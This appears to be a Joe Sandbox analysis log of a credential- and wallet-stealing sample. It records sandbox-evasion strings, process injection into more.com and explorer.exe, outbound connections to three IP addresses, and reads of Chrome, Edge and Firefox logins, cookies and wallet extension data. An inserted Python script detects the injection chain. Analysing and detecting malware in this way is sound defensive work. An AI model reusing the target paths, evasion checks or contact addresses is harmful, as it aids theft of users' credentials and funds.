                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_009D44A0 ??2@YAPAXI@Z,GetLogicalDriveStringsW,GetDriveTypeW,?assign@?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@ABV12@II@Z,?append@?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBGI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,15_2_009D44A0
                  Source: Server.exe, 0000000F.00000002.2450013196.0000000000608000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllY
                  Source: K07BOQJSAWQXKEH8FTYNN.exe, 0000000B.00000002.3673515172.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll0
                  Source: Set-up.exe, 00000001.00000000.1203909228.00000000013D4000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: P`8P`Error messageError not support systemMpVmp32Entrykernel32.dllError messageError not support systemError messageError not support systemError messageError not support systemvmtoolsd.execuckoo_svc.exexenservice.exeprocmon.exe5#
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.2102508777.00000000015A5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1898990474.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951577261.00000000015A5000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1873565102.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000002.3675598739.000000000335F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000012.00000003.2504610783.000000000335C000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                  Source: Server.exe, 0000000C.00000002.2383652464.00000000008BE000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllC
                  Source: C:\Users\user\Desktop\Set-up.exe | Process information queried: ProcessInformation
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_004A5DE2 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,12_2_004A5DE2
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_009C4D50 GetProcessHeap,HeapAlloc,??0exception@std@@QAE@ABQBDH@Z,??0thread_data_base@detail@boost@@QAE@XZ,15_2_009C4D50
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_00622CDE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,12_2_00622CDE
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 12_2_0066D9C0 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,12_2_0066D9C0
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_004A5DE2 IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,15_2_004A5DE2
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Code function: 15_2_00512CDE IsDebuggerPresent,_crt_debugger_hook,SetUnhandledExceptionFilter,UnhandledExceptionFilter,_crt_debugger_hook,GetCurrentProcess,TerminateProcess,15_2_00512CDE

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 62.60.234.80 1466
                  Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 15.197.198.189 8545
                  Source: C:\Windows\SysWOW64\explorer.exe | Network Connect: 3.161.82.59 80
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | NtProtectVirtualMemory: Direct from: 0x777463E1
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | NtProtectVirtualMemory: Direct from: 0x77747B2E
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | NtSetInformationThread: Direct from: 0x100068E4
                  Source: C:\Windows\SysWOW64\more.com | Memory written: PID: 5436 base: E579C0 value: 55
                  Source: C:\Windows\SysWOW64\more.com | Memory written: PID: 5436 base: BF4008 value: 00
                  Source: C:\Windows\SysWOW64\more.com | Memory written: PID: 5436 base: 1E0000 value: 00
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe | Section loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read write
                  Source: C:\Windows\SysWOW64\more.com | Section loaded: NULL target: C:\Windows\SysWOW64\explorer.exe protection: read write
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeSection loaded: NULL target: C:\Windows\SysWOW64\more.com protection: read writeJump to behavior
                  Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: E579C0Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: BF4008Jump to behavior
                  Source: C:\Windows\SysWOW64\more.comMemory written: C:\Windows\SysWOW64\explorer.exe base: 1E0000Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                  Source: C:\Windows\SysWOW64\more.comProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeProcess created: C:\Windows\SysWOW64\more.com C:\Windows\SysWOW64\more.comJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\K07BOQJSAWQXKEH8FTYNN.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\rareTemp.exeQueries volume information: C:\Users\user\AppData\Local\config VolumeInformationJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_004A679A GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,12_2_004A679A
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 15_2_008DE970 ?GetVersionString@config@dvacore@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@XZ,?assign@?$basic_string@EU?$char_traits@E@std@@V?$STLAllocator@E@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBEI@Z,?append@?$basic_string@EU?$char_traits@E@std@@V?$STLAllocator@E@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBEI@Z,?append@?$basic_string@EU?$char_traits@E@std@@V?$STLAllocator@E@SmallBlockAllocator@utility@dvacore@@@std@@QAEAAV12@PBEI@Z,?UTF8to16@utility@dvacore@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$STLAllocator@G@SmallBlockAllocator@utility@dvacore@@@std@@ABV?$basic_string@EU?$char_traits@E@std@@V?$STLAllocator@E@SmallBlockAllocator@utility@dvacore@@@4@PAW4UnicodeErrorCode@12@PAI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,15_2_008DE970
                  Source: C:\Users\user\Desktop\Set-up.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: Set-up.exe, 00000001.00000003.1898990474.0000000001578000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951577261.0000000001578000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1898990474.00000000015AA000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1951577261.00000000015B8000.00000004.00000020.00020000.00000000.sdmp, Set-up.exe, 00000001.00000003.1898990474.000000000158F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\Set-up.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
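The entries above describe one injection chain: Server.exe maps a section into more.com, more.com writes into and spawns explorer.exe, and it is the injected explorer.exe that makes the outbound connections (one of them to port 1466, one to 8545). The following detector is an added example, not part of the Joe Sandbox report: it runs over constructed telemetry events shaped like the report's own "Process created", "Section loaded", "Memory written" and "Network Connect" lines and flags exactly that pattern. The Event schema, the PARENT_ALLOWLIST and the "standard port" set are this example's assumptions, not a vendor format.

```python
"""Flag the Server.exe -> more.com -> explorer.exe injection chain and the
network connections made by the injected host.

Added example, not part of the Joe Sandbox report. The Event schema and the
allowlist are this example's own assumptions; SAMPLE_EVENTS are constructed
from the report's lines (plus two benign decoys), not raw sandbox output.
"""
import ntpath
from dataclasses import dataclass

# Windows binaries this sample uses as hollow hosts (report: more.com, explorer.exe).
HOLLOW_HOSTS = {r"c:\windows\syswow64\more.com", r"c:\windows\syswow64\explorer.exe"}

# Assumption: parents that legitimately create those hosts ("cmd | more" pipelines,
# userinit.exe starting the real shell). Anything else creating them is suspect.
PARENT_ALLOWLIST = {"cmd.exe", "userinit.exe", "explorer.exe"}

STANDARD_PORTS = {80, 443}


@dataclass
class Event:
    kind: str     # "process_create" | "memory_write" | "section_map" | "net_connect"
    src: str      # image path of the acting process
    target: str   # child image, injected image, or "ip:port"


def _name(path):
    # ntpath handles backslash paths on any host OS.
    return ntpath.basename(path).lower()


def analyze(events):
    """Return {"chain": [...], "c2": [(ip, port, non_standard_port), ...]}."""
    injected = set()   # images that received a cross-process write or section mapping
    chain, c2 = [], []
    for e in events:
        src, tgt = e.src.lower(), e.target.lower()
        if e.kind == "process_create" and tgt in HOLLOW_HOSTS:
            if _name(src) not in PARENT_ALLOWLIST:
                chain.append(f"{_name(src)} created {_name(tgt)}")
        elif e.kind in ("memory_write", "section_map") and tgt in HOLLOW_HOSTS and src != tgt:
            injected.add(tgt)
            verb = "mapped a section into" if e.kind == "section_map" else "wrote into"
            chain.append(f"{_name(src)} {verb} {_name(tgt)}")
        elif e.kind == "net_connect" and src in injected:
            # Only connections by a process that was written into are reported:
            # a clean explorer.exe is not expected to talk to 62.60.234.80:1466.
            ip, port = tgt.rsplit(":", 1)
            c2.append((ip, int(port), int(port) not in STANDARD_PORTS))
    return {"chain": chain, "c2": c2}


SERVER = r"C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exe"
MORE = r"C:\Windows\SysWOW64\more.com"
EXPLORER = r"C:\Windows\SysWOW64\explorer.exe"

# Constructed from the report's lines above plus two benign decoys; not raw telemetry.
SAMPLE_EVENTS = [
    Event("process_create", r"C:\Windows\SysWOW64\cmd.exe", MORE),   # benign: cmd | more
    Event("process_create", SERVER, MORE),
    Event("section_map", SERVER, MORE),
    Event("memory_write", MORE, EXPLORER),
    Event("process_create", MORE, EXPLORER),
    Event("net_connect", EXPLORER, "62.60.234.80:1466"),
    Event("net_connect", EXPLORER, "15.197.198.189:8545"),
    Event("net_connect", EXPLORER, "3.161.82.59:80"),
    Event("net_connect", r"C:\Program Files\Mozilla Firefox\firefox.exe", "203.0.113.10:443"),  # benign
]

if __name__ == "__main__":
    result = analyze(SAMPLE_EVENTS)
    for step in result["chain"]:
        print("chain:", step)
    for ip, port, odd in result["c2"]:
        print(f"c2 candidate: {ip}:{port}" + (" (non-standard port)" if odd else ""))
```

The benign "cmd | more" creation is filtered by the parent allowlist while the same child created by Server.exe is reported, and the Firefox connection is ignored because nothing was written into firefox.exe; on the constructed input the chain has four steps and three connections attributed to the injected explorer.exe.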

                  Stealing of Sensitive Information

                  Source: Yara match | File source: Process Memory Space: K07BOQJSAWQXKEH8FTYNN.exe PID: 6964, type: MEMORYSTR
                  Source: Yara match | File source: Process Memory Space: Set-up.exe PID: 7820, type: MEMORYSTR
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Electrum\wallets
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/ElectronCash
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: Wallets/JAXX New Version
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: window-state.json
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: Set-up.exe, 00000001.00000003.1872993829.00000000015AA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %appdata%\Exodus\exodus.wallet
                  Source: Set-up.exe, 00000001.00000003.1951577261.000000000158F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
                  Source: Set-up.exe, 00000001.00000003.1873144760.0000000003D3F000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: keystore
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                  Source: C:\Users\user\Desktop\Set-up.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
